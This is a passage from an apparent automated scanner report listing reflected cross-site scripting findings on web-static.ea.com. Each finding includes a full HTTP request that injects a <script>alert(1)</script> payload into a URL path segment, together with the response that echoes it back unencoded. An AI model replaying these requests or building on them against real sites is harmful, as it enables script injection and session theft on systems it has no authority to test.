Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:45 GMT
Date: Fri, 24 Jun 2011 13:43:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/18290"><script>alert(1)</script>dd234103871" />
...[SNIP]...

4.109. http://web-static.ea.com/us/portal/css/layout.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/layout.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 390e9"><script>alert(1)</script>ff23a62e26f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/390e9"><script>alert(1)</script>ff23a62e26f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/390e9"><script>alert(1)</script>ff23a62e26f" />
...[SNIP]...

4.110. http://web-static.ea.com/us/portal/css/localized.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/localized.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fda98"><script>alert(1)</script>e79b13c4c5b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/fda98"><script>alert(1)</script>e79b13c4c5b?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:14 GMT
Date: Fri, 24 Jun 2011 14:09:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/fda98"><script>alert(1)</script>e79b13c4c5b" />
...[SNIP]...

4.111. http://web-static.ea.com/us/portal/css/typography.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/typography.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85bff"><script>alert(1)</script>152fb70807f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/85bff"><script>alert(1)</script>152fb70807f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/85bff"><script>alert(1)</script>152fb70807f" />
...[SNIP]...

4.112. http://web-static.ea.com/us/portal/images/TrustELogo.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/TrustELogo.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16bd3"><script>alert(1)</script>ed9411e988f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/16bd3"><script>alert(1)</script>ed9411e988f?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30483
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:18 GMT
Date: Fri, 24 Jun 2011 14:09:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/16bd3"><script>alert(1)</script>ed9411e988f" />
...[SNIP]...

4.113. http://web-static.ea.com/us/portal/images/flag_icons/us.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/flag_icons/us.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8205"><script>alert(1)</script>a49f6911d8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/flag_icons/f8205"><script>alert(1)</script>a49f6911d8e?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/flag_icons/f8205"><script>alert(1)</script>a49f6911d8e" />
...[SNIP]...

4.114. http://web-static.ea.com/us/portal/images/icon_downloads.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_downloads.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a513d"><script>alert(1)</script>eb712656cf2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/a513d"><script>alert(1)</script>eb712656cf2?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30482
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/a513d"><script>alert(1)</script>eb712656cf2" />
...[SNIP]...

4.115. http://web-static.ea.com/us/portal/images/icon_music.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_music.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26c9"><script>alert(1)</script>c1203a90d25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/e26c9"><script>alert(1)</script>c1203a90d25?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30483
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/e26c9"><script>alert(1)</script>c1203a90d25" />
...[SNIP]...

4.116. http://web-static.ea.com/us/portal/images/icon_photo.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_photo.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1705"><script>alert(1)</script>a5dc3816470 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/c1705"><script>alert(1)</script>a5dc3816470?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30482
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:49 GMT
Date: Fri, 24 Jun 2011 13:43:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/c1705"><script>alert(1)</script>a5dc3816470" />
...[SNIP]...

4.117. http://web-static.ea.com/us/portal/images/icon_video.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_video.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b756"><script>alert(1)</script>da9a57f928c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/1b756"><script>alert(1)</script>da9a57f928c?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30483
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/1b756"><script>alert(1)</script>da9a57f928c" />
...[SNIP]...

4.118. http://web-static.ea.com/us/portal/images/icons/blog-icon.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/blog-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddaf9"><script>alert(1)</script>086cce64b98 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/ddaf9"><script>alert(1)</script>086cce64b98?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30488
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/ddaf9"><script>alert(1)</script>086cce64b98" />
...[SNIP]...

4.119. http://web-static.ea.com/us/portal/images/icons/forum-icon.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/forum-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d16"><script>alert(1)</script>80d22155cec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/70d16"><script>alert(1)</script>80d22155cec?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30489
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/70d16"><script>alert(1)</script>80d22155cec" />
...[SNIP]...

4.120. http://web-static.ea.com/us/portal/images/icons/podcast-icon.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/podcast-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed389"><script>alert(1)</script>c998434f3c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/ed389"><script>alert(1)</script>c998434f3c9?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30488
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:52 GMT
Date: Fri, 24 Jun 2011 13:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/ed389"><script>alert(1)</script>c998434f3c9" />
...[SNIP]...

4.121. http://web-static.ea.com/us/portal/images/icons/tips-icon.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/tips-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1ca"><script>alert(1)</script>cc885772821 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/3d1ca"><script>alert(1)</script>cc885772821?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30489
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/3d1ca"><script>alert(1)</script>cc885772821" />
...[SNIP]...

4.122. http://web-static.ea.com/us/portal/images/site_logos/battlefield.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/battlefield.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f1d5"><script>alert(1)</script>43f94145e0b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/7f1d5"><script>alert(1)</script>43f94145e0b?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/7f1d5"><script>alert(1)</script>43f94145e0b" />
...[SNIP]...

4.123. http://web-static.ea.com/us/portal/images/site_logos/command_conquer.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/command_conquer.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c75d4"><script>alert(1)</script>0fd901df3a2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/c75d4"><script>alert(1)</script>0fd901df3a2?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30493
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
